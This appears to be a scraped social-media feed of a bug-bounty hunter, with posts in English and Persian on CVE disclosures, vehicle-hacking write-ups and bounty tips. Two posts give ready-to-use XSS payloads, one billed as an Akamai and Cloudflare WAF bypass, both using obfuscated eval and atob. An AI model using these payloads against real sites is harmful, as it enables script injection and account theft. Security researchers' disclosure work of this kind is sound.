@radsec01

Security enthusiast

Joined February 2023
What do we even say at this point? CVE-2026-8451, a zero-day Memory Overread that watchTowr Labs identified in Citrix NetScaler appliances in March, has just been publicly disclosed with patches. We're not done yet... speak soon... ;-) labs.watchtowr.com/citrixble…
6
54
117
10,908
New subdomain went live Yii2 debug mode enabled → Full database credentials leaked in stack trace Just 3 hours later → Access Forbidden Continuous monitoring isn’t optional Note: This subdomain was only discoverable via DNS brute-force
10
443
Radman retweeted
It's time for sharing, this is not a simple write-up, we are sharing our methodology and reasoning, detailing how we approached and hunted the flaw, I hope you like it :] blog.voorivex.team/uxss-on-s…
We got permission from the Samsung Security team to disclose this uXSS that we found in Samsung Browser, it was assigned a CVE (CVE-2025-58485) and patched. Here is the PoC, expect the write-up in the next upcoming days.
12
54
1
336
26,615
Yay, i was rewarded $1500 Bug: Stored XSS via an SVG file led to full account data exposure Tip: Always try to exploit XSS and don’t just report it with a simple alert
7
11
203
11,312
I just found a WAF bypass for Akamai and Cloudflare: <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
14
187
5
1,342
82,639
IDOR + Auth Bypass = Admin takeover😎😈
1
7
1
122
5,257
rXSS via url parameter 1. I discovered reflection in a URL parameter 2. All inputs I submitted were being HTML encoded 3. I submitted the following input: https://sss'"<>, and in the response, my payload was displayed without proper sanitization. #xss #BugBounty #infosec
4
24
203
10,007
Two of the best🔥🔥
first time participating in NahamCon. I’ll cover a practical attack scenario I've made $50K with. Hope everything goes well for me
6
1,417
سال جدید رو به همه تبریک میگم امیدوارم سال خیلی خوبی برای همه باشه. برای بچه های باگ هانتر هم سال پر از باگی باشه.
44
2,031
در جلسه‌ای که با اعضای وزارت داشتم، آسیب‌پذیری به‌همراه اکسپلویت آن گزارش شد. قرار است این آسیب‌پذیری به‌زودی برطرف شود. به امید اینترنتی امن‌تر.
یه باگی روی یکی از وزارتخونه‌ها زدم که میتونم به تمام اطلاعات کاربرهاشون دسترسی پیدا کنم و چند بار هم بهشون ایمیل زدم ولی جواب ندادن. الان یک ساله که این باگ وجود داره نمیدونم چی بگم پرام ریخته از این مملکت
7
110
7,865
یه باگی روی یکی از وزارتخونه‌ها زدم که میتونم به تمام اطلاعات کاربرهاشون دسترسی پیدا کنم و چند بار هم بهشون ایمیل زدم ولی جواب ندادن. الان یک ساله که این باگ وجود داره نمیدونم چی بگم پرام ریخته از این مملکت
72
27
5
1,283
108,058
تازه عکسای کارت ملیشونم هست + کلی چیز دیگه یکی بیاد این سوراخو ببنده
5
176
11,685
یاالله سوراخ موش📿
4
133
6,781
New blog post with @infosec_au: We found a vulnerability in Subaru where an attacker, with just a license plate, could retrieve the full location history, unlock, and start vehicles remotely. The issue was reported and patched. Full post here: samcurry.net/hacking-subaru
47
313
18
1,017
118,807
To initiate mediation on HackerOne, you need to submit a mediation request first. @Hacker0x01
1
33
3,286
سلام با کلی بالا و پایین و پارگی تصمیم گرفتیم یه کنفرانس امنیتی/هانتری برگزار کنیم، امیدواریم که حرکت مثبتی باشه. تاریخ ۲۴ و ۲۵ آبان برگزار میشه، برای ارسال مقالات تا ۴ آبان وقت هست. یه سری موارد هم نمی‌گیم که سورپرایزطور باشه. کلیه جزئیات توی سایت: vooricon.com
26
54
7
459
117,787
New writeup from @_specters_ and I: we're finally allowed to disclose a vulnerability reported to Kia which would've allowed an attacker to remotely control almost all vehicles made after 2013 using only the license plate. Full disclosure: samcurry.net/hacking-kia
84
957
132
3,511
345,016
اینم بار خورد
سوراخ موش یافت شد
4
1
61
5,733
Payload: </sc</script>ript><style>@keyframes x{}</style><xss style='animation-name:x' onanimationend=eval?.(atob('Base64encodeEXP))>
17
1,518